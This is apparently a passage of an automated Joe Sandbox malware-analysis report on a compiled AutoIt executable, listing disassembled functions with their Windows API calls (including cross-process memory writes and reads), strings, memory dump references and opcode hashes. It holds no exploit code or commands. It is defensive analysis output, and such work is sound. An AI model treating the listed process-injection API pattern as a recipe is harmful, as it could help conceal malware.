_memmove.LIBCMT ref: 000862E4
_memset.LIBCMT ref: 00086308

Strings

ERCP, xrefs: 000861B3

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 3afe91a5e5e57b7e62a50905c2d5b2895159040afb3a9eb94236686ae4aa2524
Instruction ID: 88b16e3f0f6a0c3c8d9b1074817ac1dcbaca7b850ba84f6d102f60f999d6ae73
Opcode Fuzzy Hash: 3afe91a5e5e57b7e62a50905c2d5b2895159040afb3a9eb94236686ae4aa2524
Instruction Fuzzy Hash: 0851A071900719DFDB24DFA5C941BAAB7F4FF04304F2185AEE48ADB291E771AA44CB80

Function 000C97F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000D14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000C9296,?,?,00000034,00000800,?,00000034), ref: 000D14E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 000C983F

Part of subcall function 000D1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000C92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 000D14B1

Part of subcall function 000D13DE: GetWindowThreadProcessId.USER32(?,?), ref: 000D1409
Part of subcall function 000D13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,000C925A,00000034,?,?,00001004,00000000,00000000), ref: 000D1419
Part of subcall function 000D13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,000C925A,00000034,?,?,00001004,00000000,00000000), ref: 000D142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000C98AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000C98F9

Strings

@, xrefs: 000C9911

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 902d03fe1bdc3810e8868fec8fbc95ef0a51aab850ddd059d4af7f180329f80d
Instruction ID: 5ca761a58fff2e2c660dd3dd54a39682d432736c2ae4b0b141709f8870a61799
Opcode Fuzzy Hash: 902d03fe1bdc3810e8868fec8fbc95ef0a51aab850ddd059d4af7f180329f80d
Instruction Fuzzy Hash: B9413D76900219BFDB10DFA4CD85EEEBBB8EF09700F004199FA45B7291DA716E45DBA0

Function 000F7946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,000FF910,00000000,?,?,?,?), ref: 000F79DF
GetWindowLongW.USER32 ref: 000F79FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 000F7A0C

Strings

SysTreeView32, xrefs: 000F79B1

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 9409c1943ca18d078165e0eb90171351fd171ef74e5b11809e9283f1dae01767
Instruction ID: 62aa41c020cdb2a2b3c7942ee82e06d3a5fc89e99727d1978ac36966f385b155
Opcode Fuzzy Hash: 9409c1943ca18d078165e0eb90171351fd171ef74e5b11809e9283f1dae01767
Instruction Fuzzy Hash: 7431F23120820AABDB518E38CC41BFA77A9EF44324F244724FA79922E0D774ED50AB50

Function 000F73D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 000F7461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 000F7475
SendMessageW.USER32(?,00001002,00000000,?), ref: 000F7499

Strings

SysMonthCal32, xrefs: 000F742C

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: b65c3ad3b218bd610e3577b57e9926b484e2110a4e6cf75e064d0fcfc16133db
Instruction ID: 65ee399fccc951dc664d6e49d4f65d5941f20dae86053da5c64253254453732b
Opcode Fuzzy Hash: b65c3ad3b218bd610e3577b57e9926b484e2110a4e6cf75e064d0fcfc16133db
Instruction Fuzzy Hash: FA218D32500219ABDF218E64CC46FFA3BA9EF48724F110214FE196B190DB75BC91EBA0

Function 000F7B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 000F7C4A
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 000F7C58
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 000F7C5F

Strings

msctls_updown32, xrefs: 000F7BC4

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: b2f129ca38c10010475fd18ae150591da57fa29ebaf384d85b31961419702a70
Instruction ID: 338d0b534153011772d142fdb593b48bea486d2abfc0201c9ade6052d1de2b86
Opcode Fuzzy Hash: b2f129ca38c10010475fd18ae150591da57fa29ebaf384d85b31961419702a70
Instruction Fuzzy Hash: BD217AB1604209AFEB10DF28DCC1DB637EDEF4A794B140059FA099B7A1CB31EC519AA1

Function 000F6CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 000F6D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 000F6D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 000F6D70

Strings

Listbox, xrefs: 000F6D08

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: a9051f455bb4af92a714f232e8ba5adfe4696a25cc8fec58c7c6cd43856e8c42
Instruction ID: 72455f2694ce35d87e9f243cb5516ba437db26e80ad58c67ed91b92b004c0a42
Opcode Fuzzy Hash: a9051f455bb4af92a714f232e8ba5adfe4696a25cc8fec58c7c6cd43856e8c42
Instruction Fuzzy Hash: 3421803260011CBFEF118F54DC45EBB3BBAEF89750F018124FA559B5A0CA729C51ABA0

Function 000F770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 000F7772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 000F7787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 000F7794

Strings

msctls_trackbar32, xrefs: 000F7749

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 9601fc2b0a92091461f97f9110f32b867bc49f3ba4d2af3560290838dc54074f
Instruction ID: ab5d8534f6da2ad75532b4d66dadf9ffac2426bc147f0eb22aeeb0db352b89b9
Opcode Fuzzy Hash: 9601fc2b0a92091461f97f9110f32b867bc49f3ba4d2af3560290838dc54074f
Instruction Fuzzy Hash: DC11E772254309BEEF206F65CC05FFB77A9EF88B54F114118F745960A0C671E851DB10

Function 00074C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00074BD0,?,00074DEF,?,001352F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00074C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00074C23

Strings

Wow64DisableWow64FsRedirection, xrefs: 00074C1D
kernel32.dll, xrefs: 00074C0C

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 51ce23ae8ad624866d228fa3268f5e6c591bc1782ec5947f9ee13a0e85c2ad39
Instruction ID: f5d58d1f3b0c4398acb9dc8b6d8ad92a01d9ca03ff1afa2602632bbf24431ac1
Opcode Fuzzy Hash: 51ce23ae8ad624866d228fa3268f5e6c591bc1782ec5947f9ee13a0e85c2ad39
Instruction Fuzzy Hash: 45D01230911713CFD7605F71D958626B6E5FF09351B11CC399485D6550E7F8D480D650

Function 00074C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00074B83,?), ref: 00074C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00074C56

Strings

Wow64RevertWow64FsRedirection, xrefs: 00074C50
kernel32.dll, xrefs: 00074C3F

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 5b3f1de2bb7bbc446d9d0ea23a1294415cfd8742fbc5f6805d76f4c355468f13
Instruction ID: 7234fdc3a01cc539030f3c5bdfd9490e747e020aaec28686b06ff399c5aefdbd
Opcode Fuzzy Hash: 5b3f1de2bb7bbc446d9d0ea23a1294415cfd8742fbc5f6805d76f4c355468f13
Instruction Fuzzy Hash: 6CD02B30900713CFD7204F31D848236B7E8BF00340B20C83DD595C6560E778D480C610

Function 000F0DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,000F1039), ref: 000F0DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 000F0E07

Strings

advapi32.dll, xrefs: 000F0DF0
RegDeleteKeyExW, xrefs: 000F0E01

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: b112a2191811a5f529a4177688b06cfcae20aba6502b7b66c98140656177ed76
Instruction ID: 70b54a5b9f6c9895a8a3aa2d414f74c945f2dab9cff4a010c22fa44c6fa3154f
Opcode Fuzzy Hash: b112a2191811a5f529a4177688b06cfcae20aba6502b7b66c98140656177ed76
Instruction Fuzzy Hash: 5FD01770610727CFE7209F79DC086A676E5AF04352F118C3E9586D2A51E7B8D8A0DA50

Function 000E90E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,000E8CF4,?,000FF910), ref: 000E90EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 000E9100

Strings

GetModuleHandleExW, xrefs: 000E90FA
kernel32.dll, xrefs: 000E90E9

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 2c3e8d1cb6a34ae86c93913191c075694a8cefecfd6c5abaffacd96e3412ea74
Instruction ID: 41f6a57835beb77c4789a0d90509e75562df0873a0f1412bc99344ed9b72b8d4
Opcode Fuzzy Hash: 2c3e8d1cb6a34ae86c93913191c075694a8cefecfd6c5abaffacd96e3412ea74
Instruction Fuzzy Hash: EDD01734510723CFEB209F32D86862676E4AF05751B12887A9596E6A90EBB8C8C0DA90

Function 000B1714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 000B1718
__swprintf.LIBCMT ref: 000B1749

Strings

WIN_XPe, xrefs: 000B1788
%.3d, xrefs: 000B1723

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 3bb00489faeb76c82da4f2d6ba20eda1098100d39f36f76e68ef2a5417446c93
Instruction ID: 3e9b5a0495d29d77020b12fa717bb37e765cfd6402666bdfc343a59e192388c8
Opcode Fuzzy Hash: 3bb00489faeb76c82da4f2d6ba20eda1098100d39f36f76e68ef2a5417446c93
Instruction Fuzzy Hash: 3BD05B71C8C119FACB2097919C99CFD737CAB08311F940452F406D3080E7358F54EA25

Function 000C717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33a601a6ae4c9f6f4c0fec22b23efe0f763475d10f917eb4e9ddeba0c5b476df
Instruction ID: 9abbd460dca3e390160d26e25dd6e6875868528b13bd81a968d05c1fe188e23d
Opcode Fuzzy Hash: 33a601a6ae4c9f6f4c0fec22b23efe0f763475d10f917eb4e9ddeba0c5b476df
Instruction Fuzzy Hash: 3BC12875A04216EFCB14CFA4C884EAEBBB5FF48714B15859CE809EB251D731EE81DB90

Function 000EE02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 000EE0BE
CharLowerBuffW.USER32(?,?), ref: 000EE101

Part of subcall function 000ED7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 000ED7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 000EE301
_memmove.LIBCMT ref: 000EE314

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: abcb4a6b837a096ce7424eba11b01ac246eff1e532f5b0531aa158165a53dcc7
Instruction ID: ff6d2c06d5854e6a2bef1be0aa248b85934daa1a1acfeb5265b46ca205145797
Opcode Fuzzy Hash: abcb4a6b837a096ce7424eba11b01ac246eff1e532f5b0531aa158165a53dcc7
Instruction Fuzzy Hash: 59C18971A08381CFC750DF29C48096ABBE4FF89314F04896EF999AB352D731E945CB82

Function 000E8093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 000E80C3
CoUninitialize.OLE32 ref: 000E80CE

Part of subcall function 000CD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 000CD5D4

VariantInit.OLEAUT32(?), ref: 000E80D9
VariantClear.OLEAUT32(?), ref: 000E83AA

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 9d29946da1251959f50b37c2de098e2192641f4dd1222279ff4863998f370af7
Instruction ID: e12fa274616260a0f8fa080f449af4288aa34b00873a055b7055ba34d3c63793
Opcode Fuzzy Hash: 9d29946da1251959f50b37c2de098e2192641f4dd1222279ff4863998f370af7
Instruction Fuzzy Hash: 9FA166356047419FCB50DF65C481A6EB7E4BF89714F04844CFA9AAB3A2CB34ED05CB86

Function 000C7530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00102C7C,?), ref: 000C76EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00102C7C,?), ref: 000C7702
CLSIDFromProgID.OLE32(?,?,00000000,000FFB80,000000FF,?,00000000,00000800,00000000,?,00102C7C,?), ref: 000C7727
_memcmp.LIBCMT ref: 000C7748

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: afd7f370aa0b772323357b3330c8773c1bd6a48aa223930e9d3a9c71f532f772
Instruction ID: 04e33864bdd12eae7f9a8acc0cc35a7954621f1b80de911db28dad4a0121902d
Opcode Fuzzy Hash: afd7f370aa0b772323357b3330c8773c1bd6a48aa223930e9d3a9c71f532f772
Instruction Fuzzy Hash: A3810C75A00109EFCB04DFA4C984EEEB7B9FF89315F204598E509AB250DB71AE06DF60

Function 000C687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 000C688E
SysAllocString.OLEAUT32(00000000), ref: 000C6937
VariantCopy.OLEAUT32 ref: 000C6966
VariantClear.OLEAUT32(?), ref: 000C698D

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: f3a09f4af5b2c1a798da6bd588501de64772f8c4ab880b633a93754e8e46dad6
Instruction ID: b5f46edccbaa79c99cd13ff3f487eeed360fd2907e8740a3d6718a7d7de55850
Opcode Fuzzy Hash: f3a09f4af5b2c1a798da6bd588501de64772f8c4ab880b633a93754e8e46dad6
Instruction Fuzzy Hash: FC51B2746003029ADB74AF65D891F7EB3E5AF44310F20C81FE58ADB292DB36D840DB06

Function 000F97F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0152EC70,?), ref: 000F9863
ScreenToClient.USER32(00000002,00000002), ref: 000F9896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 000F9903

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin
